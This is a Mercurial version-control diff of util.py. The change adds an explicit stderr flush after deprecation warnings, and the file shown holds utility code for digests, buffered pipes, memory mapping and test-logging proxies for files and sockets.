util: flush stderr explicitly after using warnings.warn()...
Pulkit Goyal
r45513:f46a333f default draft
@@ -1,3596 +1,3598 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import attr
38 38 from .pycompat import (
39 39 delattr,
40 40 getattr,
41 41 open,
42 42 setattr,
43 43 )
44 44 from hgdemandimport import tracing
45 45 from . import (
46 46 encoding,
47 47 error,
48 48 i18n,
49 49 node as nodemod,
50 50 policy,
51 51 pycompat,
52 52 urllibcompat,
53 53 )
54 54 from .utils import (
55 55 compression,
56 56 hashutil,
57 57 procutil,
58 58 stringutil,
59 59 )
60 60
61 61 base85 = policy.importmod('base85')
62 62 osutil = policy.importmod('osutil')
63 63
64 64 b85decode = base85.b85decode
65 65 b85encode = base85.b85encode
66 66
67 67 cookielib = pycompat.cookielib
68 68 httplib = pycompat.httplib
69 69 pickle = pycompat.pickle
70 70 safehasattr = pycompat.safehasattr
71 71 socketserver = pycompat.socketserver
72 72 bytesio = pycompat.bytesio
73 73 # TODO deprecate stringio name, as it is a lie on Python 3.
74 74 stringio = bytesio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 if pycompat.iswindows:
85 85 from . import windows as platform
86 86 else:
87 87 from . import posix as platform
88 88
89 89 _ = i18n._
90 90
91 91 bindunixsocket = platform.bindunixsocket
92 92 cachestat = platform.cachestat
93 93 checkexec = platform.checkexec
94 94 checklink = platform.checklink
95 95 copymode = platform.copymode
96 96 expandglobs = platform.expandglobs
97 97 getfsmountpoint = platform.getfsmountpoint
98 98 getfstype = platform.getfstype
99 99 groupmembers = platform.groupmembers
100 100 groupname = platform.groupname
101 101 isexec = platform.isexec
102 102 isowner = platform.isowner
103 103 listdir = osutil.listdir
104 104 localpath = platform.localpath
105 105 lookupreg = platform.lookupreg
106 106 makedir = platform.makedir
107 107 nlinks = platform.nlinks
108 108 normpath = platform.normpath
109 109 normcase = platform.normcase
110 110 normcasespec = platform.normcasespec
111 111 normcasefallback = platform.normcasefallback
112 112 openhardlinks = platform.openhardlinks
113 113 oslink = platform.oslink
114 114 parsepatchoutput = platform.parsepatchoutput
115 115 pconvert = platform.pconvert
116 116 poll = platform.poll
117 117 posixfile = platform.posixfile
118 118 readlink = platform.readlink
119 119 rename = platform.rename
120 120 removedirs = platform.removedirs
121 121 samedevice = platform.samedevice
122 122 samefile = platform.samefile
123 123 samestat = platform.samestat
124 124 setflags = platform.setflags
125 125 split = platform.split
126 126 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
127 127 statisexec = platform.statisexec
128 128 statislink = platform.statislink
129 129 umask = platform.umask
130 130 unlink = platform.unlink
131 131 username = platform.username
132 132
133 133
134 134 def setumask(val):
135 135 ''' updates the umask. used by chg server '''
136 136 if pycompat.iswindows:
137 137 return
138 138 os.umask(val)
139 139 global umask
140 140 platform.umask = umask = val & 0o777
141 141
142 142
143 143 # small compat layer
144 144 compengines = compression.compengines
145 145 SERVERROLE = compression.SERVERROLE
146 146 CLIENTROLE = compression.CLIENTROLE
147 147
148 148 try:
149 149 recvfds = osutil.recvfds
150 150 except AttributeError:
151 151 pass
152 152
153 153 # Python compatibility
154 154
155 155 _notset = object()
156 156
157 157
158 158 def bitsfrom(container):
159 159 bits = 0
160 160 for bit in container:
161 161 bits |= bit
162 162 return bits
163 163
164 164
165 165 # python 2.6 still has deprecation warnings enabled by default. We do not
166 166 # want to display anything to the standard user, so detect if we are running
167 167 # tests and only use python deprecation warnings in this case.
168 168 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
169 169 if _dowarn:
170 170 # explicitly unfilter our warning for python 2.7
171 171 #
172 172 # The option of setting PYTHONWARNINGS in the test runner was investigated.
173 173 # However, a module name set through PYTHONWARNINGS was matched exactly, so
174 174 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
175 175 # makes the whole PYTHONWARNINGS approach useless for our use case.
176 176 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
177 177 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
178 178 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
179 179 if _dowarn and pycompat.ispy3:
180 180 # silence warning emitted by passing user string to re.sub()
181 181 warnings.filterwarnings(
182 182 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
183 183 )
184 184 warnings.filterwarnings(
185 185 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
186 186 )
187 187 # TODO: reinvent imp.is_frozen()
188 188 warnings.filterwarnings(
189 189 'ignore',
190 190 'the imp module is deprecated',
191 191 DeprecationWarning,
192 192 'mercurial',
193 193 )
194 194
195 195
196 196 def nouideprecwarn(msg, version, stacklevel=1):
197 197 """Issue an python native deprecation warning
198 198
199 199 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
200 200 """
201 201 if _dowarn:
202 202 msg += (
203 203 b"\n(compatibility will be dropped after Mercurial-%s,"
204 204 b" update your code.)"
205 205 ) % version
206 206 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 # on python 3 with chg, we will need to explicitly flush the output
208 sys.stderr.flush()
207 209
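# A sketch of the failure mode the two added lines above address (the
# helper below is hypothetical): under chg on Python 3, sys.stderr can be
# block-buffered, and warnings.showwarning() writes the message without
# flushing, so it may stay invisible until the process exits.
def _demoflushafterwarn():
    warnings.warn('example deprecation', DeprecationWarning, stacklevel=2)
    # with a block-buffered stderr, the warning text is not yet visible
    # here; the explicit flush pushes it out immediately
    sys.stderr.flush()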
208 210
209 211 DIGESTS = {
210 212 b'md5': hashlib.md5,
211 213 b'sha1': hashutil.sha1,
212 214 b'sha512': hashlib.sha512,
213 215 }
214 216 # List of digest types from strongest to weakest
215 217 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
216 218
217 219 for k in DIGESTS_BY_STRENGTH:
218 220 assert k in DIGESTS
219 221
220 222
221 223 class digester(object):
222 224 """helper to compute digests.
223 225
224 226 This helper can be used to compute one or more digests given their name.
225 227
226 228 >>> d = digester([b'md5', b'sha1'])
227 229 >>> d.update(b'foo')
228 230 >>> [k for k in sorted(d)]
229 231 ['md5', 'sha1']
230 232 >>> d[b'md5']
231 233 'acbd18db4cc2f85cedef654fccc4a4d8'
232 234 >>> d[b'sha1']
233 235 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
234 236 >>> digester.preferred([b'md5', b'sha1'])
235 237 'sha1'
236 238 """
237 239
238 240 def __init__(self, digests, s=b''):
239 241 self._hashes = {}
240 242 for k in digests:
241 243 if k not in DIGESTS:
242 244 raise error.Abort(_(b'unknown digest type: %s') % k)
243 245 self._hashes[k] = DIGESTS[k]()
244 246 if s:
245 247 self.update(s)
246 248
247 249 def update(self, data):
248 250 for h in self._hashes.values():
249 251 h.update(data)
250 252
251 253 def __getitem__(self, key):
252 254 if key not in DIGESTS:
253 255 raise error.Abort(_(b'unknown digest type: %s') % key)
254 256 return nodemod.hex(self._hashes[key].digest())
255 257
256 258 def __iter__(self):
257 259 return iter(self._hashes)
258 260
259 261 @staticmethod
260 262 def preferred(supported):
261 263 """returns the strongest digest type in both supported and DIGESTS."""
262 264
263 265 for k in DIGESTS_BY_STRENGTH:
264 266 if k in supported:
265 267 return k
266 268 return None
267 269
268 270
269 271 class digestchecker(object):
270 272 """file handle wrapper that additionally checks content against a given
271 273 size and digests.
272 274
273 275 d = digestchecker(fh, size, {'md5': '...'})
274 276
275 277 When multiple digests are given, all of them are validated.
276 278 """
277 279
278 280 def __init__(self, fh, size, digests):
279 281 self._fh = fh
280 282 self._size = size
281 283 self._got = 0
282 284 self._digests = dict(digests)
283 285 self._digester = digester(self._digests.keys())
284 286
285 287 def read(self, length=-1):
286 288 content = self._fh.read(length)
287 289 self._digester.update(content)
288 290 self._got += len(content)
289 291 return content
290 292
291 293 def validate(self):
292 294 if self._size != self._got:
293 295 raise error.Abort(
294 296 _(b'size mismatch: expected %d, got %d')
295 297 % (self._size, self._got)
296 298 )
297 299 for k, v in self._digests.items():
298 300 if v != self._digester[k]:
299 301 # i18n: first parameter is a digest name
300 302 raise error.Abort(
301 303 _(b'%s mismatch: expected %s, got %s')
302 304 % (k, v, self._digester[k])
303 305 )
304 306
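# Usage sketch (arguments are illustrative): wrap a file handle, drain it,
# then validate against the expected size and digests.
def _demodigestcheck(fh, size, sha1hex):
    wrapped = digestchecker(fh, size, {b'sha1': sha1hex})
    while wrapped.read(4096):
        pass
    wrapped.validate()  # raises error.Abort on a size or digest mismatch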
305 307
306 308 try:
307 309 buffer = buffer
308 310 except NameError:
309 311
310 312 def buffer(sliceable, offset=0, length=None):
311 313 if length is not None:
312 314 return memoryview(sliceable)[offset : offset + length]
313 315 return memoryview(sliceable)[offset:]
314 316
315 317
316 318 _chunksize = 4096
317 319
318 320
319 321 class bufferedinputpipe(object):
320 322 """a manually buffered input pipe
321 323
322 324 Python will not let us use buffered IO and lazy reading with 'polling' at
323 325 the same time. We cannot probe the buffer state, and select will not detect
324 326 that data is ready to read if it is already buffered.
325 327
326 328 This class lets us work around that by implementing its own buffering
327 329 (allowing efficient readline) while offering a way to know if the buffer is
328 330 empty from the output (allowing collaboration of the buffer with polling).
329 331
330 332 This class lives in the 'util' module because it makes use of the 'os'
331 333 module from the python stdlib.
332 334 """
333 335
334 336 def __new__(cls, fh):
335 337 # If we receive a fileobjectproxy, we need to use a variation of this
336 338 # class that notifies observers about activity.
337 339 if isinstance(fh, fileobjectproxy):
338 340 cls = observedbufferedinputpipe
339 341
340 342 return super(bufferedinputpipe, cls).__new__(cls)
341 343
342 344 def __init__(self, input):
343 345 self._input = input
344 346 self._buffer = []
345 347 self._eof = False
346 348 self._lenbuf = 0
347 349
348 350 @property
349 351 def hasbuffer(self):
350 352 """True is any data is currently buffered
351 353
352 354 This will be used externally a pre-step for polling IO. If there is
353 355 already data then no polling should be set in place."""
354 356 return bool(self._buffer)
355 357
356 358 @property
357 359 def closed(self):
358 360 return self._input.closed
359 361
360 362 def fileno(self):
361 363 return self._input.fileno()
362 364
363 365 def close(self):
364 366 return self._input.close()
365 367
366 368 def read(self, size):
367 369 while (not self._eof) and (self._lenbuf < size):
368 370 self._fillbuffer()
369 371 return self._frombuffer(size)
370 372
371 373 def unbufferedread(self, size):
372 374 if not self._eof and self._lenbuf == 0:
373 375 self._fillbuffer(max(size, _chunksize))
374 376 return self._frombuffer(min(self._lenbuf, size))
375 377
376 378 def readline(self, *args, **kwargs):
377 379 if len(self._buffer) > 1:
378 380 # this should not happen because both read and readline end with a
379 381 # _frombuffer call that collapses it.
380 382 self._buffer = [b''.join(self._buffer)]
381 383 self._lenbuf = len(self._buffer[0])
382 384 lfi = -1
383 385 if self._buffer:
384 386 lfi = self._buffer[-1].find(b'\n')
385 387 while (not self._eof) and lfi < 0:
386 388 self._fillbuffer()
387 389 if self._buffer:
388 390 lfi = self._buffer[-1].find(b'\n')
389 391 size = lfi + 1
390 392 if lfi < 0: # end of file
391 393 size = self._lenbuf
392 394 elif len(self._buffer) > 1:
393 395 # we need to take previous chunks into account
394 396 size += self._lenbuf - len(self._buffer[-1])
395 397 return self._frombuffer(size)
396 398
397 399 def _frombuffer(self, size):
398 400 """return at most 'size' data from the buffer
399 401
400 402 The data are removed from the buffer."""
401 403 if size == 0 or not self._buffer:
402 404 return b''
403 405 buf = self._buffer[0]
404 406 if len(self._buffer) > 1:
405 407 buf = b''.join(self._buffer)
406 408
407 409 data = buf[:size]
408 410 buf = buf[len(data) :]
409 411 if buf:
410 412 self._buffer = [buf]
411 413 self._lenbuf = len(buf)
412 414 else:
413 415 self._buffer = []
414 416 self._lenbuf = 0
415 417 return data
416 418
417 419 def _fillbuffer(self, size=_chunksize):
418 420 """read data to the buffer"""
419 421 data = os.read(self._input.fileno(), size)
420 422 if not data:
421 423 self._eof = True
422 424 else:
423 425 self._lenbuf += len(data)
424 426 self._buffer.append(data)
425 427
426 428 return data
427 429
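# Sketch of the buffer/polling collaboration described in the docstring
# above (the wiring is illustrative):
def _demopolledreadline(rawinput):
    pipe = bufferedinputpipe(rawinput)
    if not pipe.hasbuffer:
        poll([pipe.fileno()])  # only poll when nothing is already buffered
    return pipe.readline()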
428 430
429 431 def mmapread(fp, size=None):
430 432 if size == 0:
431 433 # size of 0 to mmap.mmap() means "all data"
432 434 # rather than "zero bytes", so special case that.
433 435 return b''
434 436 elif size is None:
435 437 size = 0
436 438 try:
437 439 fd = getattr(fp, 'fileno', lambda: fp)()
438 440 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
439 441 except ValueError:
440 442 # Empty files cannot be mmapped, but mmapread should still work. Check
441 443 # if the file is empty, and if so, return an empty buffer.
442 444 if os.fstat(fd).st_size == 0:
443 445 return b''
444 446 raise
445 447
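# Usage sketch: mmapread() accepts a file object or a raw descriptor and
# treats size=None as "map the whole file" (the prefix read below assumes
# the file holds at least 4096 bytes).
def _demommapread(fp):
    whole = mmapread(fp)       # the entire file as a read-only memory map
    head = mmapread(fp, 4096)  # only the first 4096 bytes
    return whole, head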
446 448
447 449 class fileobjectproxy(object):
448 450 """A proxy around file objects that tells a watcher when events occur.
449 451
450 452 This type is intended to only be used for testing purposes. Think hard
451 453 before using it in important code.
452 454 """
453 455
454 456 __slots__ = (
455 457 '_orig',
456 458 '_observer',
457 459 )
458 460
459 461 def __init__(self, fh, observer):
460 462 object.__setattr__(self, '_orig', fh)
461 463 object.__setattr__(self, '_observer', observer)
462 464
463 465 def __getattribute__(self, name):
464 466 ours = {
465 467 '_observer',
466 468 # IOBase
467 469 'close',
468 470 # closed is a property
469 471 'fileno',
470 472 'flush',
471 473 'isatty',
472 474 'readable',
473 475 'readline',
474 476 'readlines',
475 477 'seek',
476 478 'seekable',
477 479 'tell',
478 480 'truncate',
479 481 'writable',
480 482 'writelines',
481 483 # RawIOBase
482 484 'read',
483 485 'readall',
484 486 'readinto',
485 487 'write',
486 488 # BufferedIOBase
487 489 # raw is a property
488 490 'detach',
489 491 # read defined above
490 492 'read1',
491 493 # readinto defined above
492 494 # write defined above
493 495 }
494 496
495 497 # We only observe some methods.
496 498 if name in ours:
497 499 return object.__getattribute__(self, name)
498 500
499 501 return getattr(object.__getattribute__(self, '_orig'), name)
500 502
501 503 def __nonzero__(self):
502 504 return bool(object.__getattribute__(self, '_orig'))
503 505
504 506 __bool__ = __nonzero__
505 507
506 508 def __delattr__(self, name):
507 509 return delattr(object.__getattribute__(self, '_orig'), name)
508 510
509 511 def __setattr__(self, name, value):
510 512 return setattr(object.__getattribute__(self, '_orig'), name, value)
511 513
512 514 def __iter__(self):
513 515 return object.__getattribute__(self, '_orig').__iter__()
514 516
515 517 def _observedcall(self, name, *args, **kwargs):
516 518 # Call the original object.
517 519 orig = object.__getattribute__(self, '_orig')
518 520 res = getattr(orig, name)(*args, **kwargs)
519 521
520 522 # Call a method on the observer of the same name with arguments
521 523 # so it can react, log, etc.
522 524 observer = object.__getattribute__(self, '_observer')
523 525 fn = getattr(observer, name, None)
524 526 if fn:
525 527 fn(res, *args, **kwargs)
526 528
527 529 return res
528 530
529 531 def close(self, *args, **kwargs):
530 532 return object.__getattribute__(self, '_observedcall')(
531 533 'close', *args, **kwargs
532 534 )
533 535
534 536 def fileno(self, *args, **kwargs):
535 537 return object.__getattribute__(self, '_observedcall')(
536 538 'fileno', *args, **kwargs
537 539 )
538 540
539 541 def flush(self, *args, **kwargs):
540 542 return object.__getattribute__(self, '_observedcall')(
541 543 'flush', *args, **kwargs
542 544 )
543 545
544 546 def isatty(self, *args, **kwargs):
545 547 return object.__getattribute__(self, '_observedcall')(
546 548 'isatty', *args, **kwargs
547 549 )
548 550
549 551 def readable(self, *args, **kwargs):
550 552 return object.__getattribute__(self, '_observedcall')(
551 553 'readable', *args, **kwargs
552 554 )
553 555
554 556 def readline(self, *args, **kwargs):
555 557 return object.__getattribute__(self, '_observedcall')(
556 558 'readline', *args, **kwargs
557 559 )
558 560
559 561 def readlines(self, *args, **kwargs):
560 562 return object.__getattribute__(self, '_observedcall')(
561 563 'readlines', *args, **kwargs
562 564 )
563 565
564 566 def seek(self, *args, **kwargs):
565 567 return object.__getattribute__(self, '_observedcall')(
566 568 'seek', *args, **kwargs
567 569 )
568 570
569 571 def seekable(self, *args, **kwargs):
570 572 return object.__getattribute__(self, '_observedcall')(
571 573 'seekable', *args, **kwargs
572 574 )
573 575
574 576 def tell(self, *args, **kwargs):
575 577 return object.__getattribute__(self, '_observedcall')(
576 578 'tell', *args, **kwargs
577 579 )
578 580
579 581 def truncate(self, *args, **kwargs):
580 582 return object.__getattribute__(self, '_observedcall')(
581 583 'truncate', *args, **kwargs
582 584 )
583 585
584 586 def writable(self, *args, **kwargs):
585 587 return object.__getattribute__(self, '_observedcall')(
586 588 'writable', *args, **kwargs
587 589 )
588 590
589 591 def writelines(self, *args, **kwargs):
590 592 return object.__getattribute__(self, '_observedcall')(
591 593 'writelines', *args, **kwargs
592 594 )
593 595
594 596 def read(self, *args, **kwargs):
595 597 return object.__getattribute__(self, '_observedcall')(
596 598 'read', *args, **kwargs
597 599 )
598 600
599 601 def readall(self, *args, **kwargs):
600 602 return object.__getattribute__(self, '_observedcall')(
601 603 'readall', *args, **kwargs
602 604 )
603 605
604 606 def readinto(self, *args, **kwargs):
605 607 return object.__getattribute__(self, '_observedcall')(
606 608 'readinto', *args, **kwargs
607 609 )
608 610
609 611 def write(self, *args, **kwargs):
610 612 return object.__getattribute__(self, '_observedcall')(
611 613 'write', *args, **kwargs
612 614 )
613 615
614 616 def detach(self, *args, **kwargs):
615 617 return object.__getattribute__(self, '_observedcall')(
616 618 'detach', *args, **kwargs
617 619 )
618 620
619 621 def read1(self, *args, **kwargs):
620 622 return object.__getattribute__(self, '_observedcall')(
621 623 'read1', *args, **kwargs
622 624 )
623 625
624 626
625 627 class observedbufferedinputpipe(bufferedinputpipe):
626 628 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
627 629
628 630 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
629 631 bypass ``fileobjectproxy``. Because of this, we need to make
630 632 ``bufferedinputpipe`` aware of these operations.
631 633
632 634 This variation of ``bufferedinputpipe`` can notify observers about
633 635 ``os.read()`` events. It also re-publishes other events, such as
634 636 ``read()`` and ``readline()``.
635 637 """
636 638
637 639 def _fillbuffer(self):
638 640 res = super(observedbufferedinputpipe, self)._fillbuffer()
639 641
640 642 fn = getattr(self._input._observer, 'osread', None)
641 643 if fn:
642 644 fn(res, _chunksize)
643 645
644 646 return res
645 647
646 648 # We use different observer methods because the operation isn't
647 649 # performed on the actual file object but on us.
648 650 def read(self, size):
649 651 res = super(observedbufferedinputpipe, self).read(size)
650 652
651 653 fn = getattr(self._input._observer, 'bufferedread', None)
652 654 if fn:
653 655 fn(res, size)
654 656
655 657 return res
656 658
657 659 def readline(self, *args, **kwargs):
658 660 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
659 661
660 662 fn = getattr(self._input._observer, 'bufferedreadline', None)
661 663 if fn:
662 664 fn(res)
663 665
664 666 return res
665 667
666 668
667 669 PROXIED_SOCKET_METHODS = {
668 670 'makefile',
669 671 'recv',
670 672 'recvfrom',
671 673 'recvfrom_into',
672 674 'recv_into',
673 675 'send',
674 676 'sendall',
675 677 'sendto',
676 678 'setblocking',
677 679 'settimeout',
678 680 'gettimeout',
679 681 'setsockopt',
680 682 }
681 683
682 684
683 685 class socketproxy(object):
684 686 """A proxy around a socket that tells a watcher when events occur.
685 687
686 688 This is like ``fileobjectproxy`` except for sockets.
687 689
688 690 This type is intended to only be used for testing purposes. Think hard
689 691 before using it in important code.
690 692 """
691 693
692 694 __slots__ = (
693 695 '_orig',
694 696 '_observer',
695 697 )
696 698
697 699 def __init__(self, sock, observer):
698 700 object.__setattr__(self, '_orig', sock)
699 701 object.__setattr__(self, '_observer', observer)
700 702
701 703 def __getattribute__(self, name):
702 704 if name in PROXIED_SOCKET_METHODS:
703 705 return object.__getattribute__(self, name)
704 706
705 707 return getattr(object.__getattribute__(self, '_orig'), name)
706 708
707 709 def __delattr__(self, name):
708 710 return delattr(object.__getattribute__(self, '_orig'), name)
709 711
710 712 def __setattr__(self, name, value):
711 713 return setattr(object.__getattribute__(self, '_orig'), name, value)
712 714
713 715 def __nonzero__(self):
714 716 return bool(object.__getattribute__(self, '_orig'))
715 717
716 718 __bool__ = __nonzero__
717 719
718 720 def _observedcall(self, name, *args, **kwargs):
719 721 # Call the original object.
720 722 orig = object.__getattribute__(self, '_orig')
721 723 res = getattr(orig, name)(*args, **kwargs)
722 724
723 725 # Call a method on the observer of the same name with arguments
724 726 # so it can react, log, etc.
725 727 observer = object.__getattribute__(self, '_observer')
726 728 fn = getattr(observer, name, None)
727 729 if fn:
728 730 fn(res, *args, **kwargs)
729 731
730 732 return res
731 733
732 734 def makefile(self, *args, **kwargs):
733 735 res = object.__getattribute__(self, '_observedcall')(
734 736 'makefile', *args, **kwargs
735 737 )
736 738
737 739 # The file object may be used for I/O. So we turn it into a
738 740 # proxy using our observer.
739 741 observer = object.__getattribute__(self, '_observer')
740 742 return makeloggingfileobject(
741 743 observer.fh,
742 744 res,
743 745 observer.name,
744 746 reads=observer.reads,
745 747 writes=observer.writes,
746 748 logdata=observer.logdata,
747 749 logdataapis=observer.logdataapis,
748 750 )
749 751
750 752 def recv(self, *args, **kwargs):
751 753 return object.__getattribute__(self, '_observedcall')(
752 754 'recv', *args, **kwargs
753 755 )
754 756
755 757 def recvfrom(self, *args, **kwargs):
756 758 return object.__getattribute__(self, '_observedcall')(
757 759 'recvfrom', *args, **kwargs
758 760 )
759 761
760 762 def recvfrom_into(self, *args, **kwargs):
761 763 return object.__getattribute__(self, '_observedcall')(
762 764 'recvfrom_into', *args, **kwargs
763 765 )
764 766
765 767 def recv_into(self, *args, **kwargs):
766 768 return object.__getattribute__(self, '_observedcall')(
767 769 'recv_into', *args, **kwargs
768 770 )
769 771
770 772 def send(self, *args, **kwargs):
771 773 return object.__getattribute__(self, '_observedcall')(
772 774 'send', *args, **kwargs
773 775 )
774 776
775 777 def sendall(self, *args, **kwargs):
776 778 return object.__getattribute__(self, '_observedcall')(
777 779 'sendall', *args, **kwargs
778 780 )
779 781
780 782 def sendto(self, *args, **kwargs):
781 783 return object.__getattribute__(self, '_observedcall')(
782 784 'sendto', *args, **kwargs
783 785 )
784 786
785 787 def setblocking(self, *args, **kwargs):
786 788 return object.__getattribute__(self, '_observedcall')(
787 789 'setblocking', *args, **kwargs
788 790 )
789 791
790 792 def settimeout(self, *args, **kwargs):
791 793 return object.__getattribute__(self, '_observedcall')(
792 794 'settimeout', *args, **kwargs
793 795 )
794 796
795 797 def gettimeout(self, *args, **kwargs):
796 798 return object.__getattribute__(self, '_observedcall')(
797 799 'gettimeout', *args, **kwargs
798 800 )
799 801
800 802 def setsockopt(self, *args, **kwargs):
801 803 return object.__getattribute__(self, '_observedcall')(
802 804 'setsockopt', *args, **kwargs
803 805 )
804 806
805 807
806 808 class baseproxyobserver(object):
807 809 def __init__(self, fh, name, logdata, logdataapis):
808 810 self.fh = fh
809 811 self.name = name
810 812 self.logdata = logdata
811 813 self.logdataapis = logdataapis
812 814
813 815 def _writedata(self, data):
814 816 if not self.logdata:
815 817 if self.logdataapis:
816 818 self.fh.write(b'\n')
817 819 self.fh.flush()
818 820 return
819 821
820 822 # Simple case writes all data on a single line.
821 823 if b'\n' not in data:
822 824 if self.logdataapis:
823 825 self.fh.write(b': %s\n' % stringutil.escapestr(data))
824 826 else:
825 827 self.fh.write(
826 828 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
827 829 )
828 830 self.fh.flush()
829 831 return
830 832
831 833 # Data with newlines is written to multiple lines.
832 834 if self.logdataapis:
833 835 self.fh.write(b':\n')
834 836
835 837 lines = data.splitlines(True)
836 838 for line in lines:
837 839 self.fh.write(
838 840 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
839 841 )
840 842 self.fh.flush()
841 843
842 844
843 845 class fileobjectobserver(baseproxyobserver):
844 846 """Logs file object activity."""
845 847
846 848 def __init__(
847 849 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
848 850 ):
849 851 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
850 852 self.reads = reads
851 853 self.writes = writes
852 854
853 855 def read(self, res, size=-1):
854 856 if not self.reads:
855 857 return
856 858 # Python 3 can return None from reads at EOF instead of empty strings.
857 859 if res is None:
858 860 res = b''
859 861
860 862 if size == -1 and res == b'':
861 863 # Suppress pointless read(-1) calls that return
862 864 # nothing. These happen _a lot_ on Python 3, and there
863 865 # doesn't seem to be a better workaround to have matching
864 866 # Python 2 and 3 behavior. :(
865 867 return
866 868
867 869 if self.logdataapis:
868 870 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
869 871
870 872 self._writedata(res)
871 873
872 874 def readline(self, res, limit=-1):
873 875 if not self.reads:
874 876 return
875 877
876 878 if self.logdataapis:
877 879 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
878 880
879 881 self._writedata(res)
880 882
881 883 def readinto(self, res, dest):
882 884 if not self.reads:
883 885 return
884 886
885 887 if self.logdataapis:
886 888 self.fh.write(
887 889 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
888 890 )
889 891
890 892 data = dest[0:res] if res is not None else b''
891 893
892 894 # _writedata() uses "in" operator and is confused by memoryview because
893 895 # characters are ints on Python 3.
894 896 if isinstance(data, memoryview):
895 897 data = data.tobytes()
896 898
897 899 self._writedata(data)
898 900
899 901 def write(self, res, data):
900 902 if not self.writes:
901 903 return
902 904
903 905 # Python 2 returns None from some write() calls. Python 3 (reasonably)
904 906 # returns the integer bytes written.
905 907 if res is None and data:
906 908 res = len(data)
907 909
908 910 if self.logdataapis:
909 911 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
910 912
911 913 self._writedata(data)
912 914
913 915 def flush(self, res):
914 916 if not self.writes:
915 917 return
916 918
917 919 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
918 920
919 921 # For observedbufferedinputpipe.
920 922 def bufferedread(self, res, size):
921 923 if not self.reads:
922 924 return
923 925
924 926 if self.logdataapis:
925 927 self.fh.write(
926 928 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
927 929 )
928 930
929 931 self._writedata(res)
930 932
931 933 def bufferedreadline(self, res):
932 934 if not self.reads:
933 935 return
934 936
935 937 if self.logdataapis:
936 938 self.fh.write(
937 939 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
938 940 )
939 941
940 942 self._writedata(res)
941 943
942 944
943 945 def makeloggingfileobject(
944 946 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
945 947 ):
946 948 """Turn a file object into a logging file object."""
947 949
948 950 observer = fileobjectobserver(
949 951 logh,
950 952 name,
951 953 reads=reads,
952 954 writes=writes,
953 955 logdata=logdata,
954 956 logdataapis=logdataapis,
955 957 )
956 958 return fileobjectproxy(fh, observer)
957 959
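# Wiring sketch for tests (the log handle and name are illustrative):
# every proxied call is mirrored to the log before the result is returned.
def _demologgingfile(logfh, fh):
    proxied = makeloggingfileobject(logfh, fh, b'myfile', logdata=True)
    proxied.write(b'data')  # logfh sees roughly b'myfile> write(4) -> 4: data'
    return proxied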
958 960
959 961 class socketobserver(baseproxyobserver):
960 962 """Logs socket activity."""
961 963
962 964 def __init__(
963 965 self,
964 966 fh,
965 967 name,
966 968 reads=True,
967 969 writes=True,
968 970 states=True,
969 971 logdata=False,
970 972 logdataapis=True,
971 973 ):
972 974 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
973 975 self.reads = reads
974 976 self.writes = writes
975 977 self.states = states
976 978
977 979 def makefile(self, res, mode=None, bufsize=None):
978 980 if not self.states:
979 981 return
980 982
981 983 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
982 984
983 985 def recv(self, res, size, flags=0):
984 986 if not self.reads:
985 987 return
986 988
987 989 if self.logdataapis:
988 990 self.fh.write(
989 991 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
990 992 )
991 993 self._writedata(res)
992 994
993 995 def recvfrom(self, res, size, flags=0):
994 996 if not self.reads:
995 997 return
996 998
997 999 if self.logdataapis:
998 1000 self.fh.write(
999 1001 b'%s> recvfrom(%d, %d) -> %d'
1000 1002 % (self.name, size, flags, len(res[0]))
1001 1003 )
1002 1004
1003 1005 self._writedata(res[0])
1004 1006
1005 1007 def recvfrom_into(self, res, buf, size, flags=0):
1006 1008 if not self.reads:
1007 1009 return
1008 1010
1009 1011 if self.logdataapis:
1010 1012 self.fh.write(
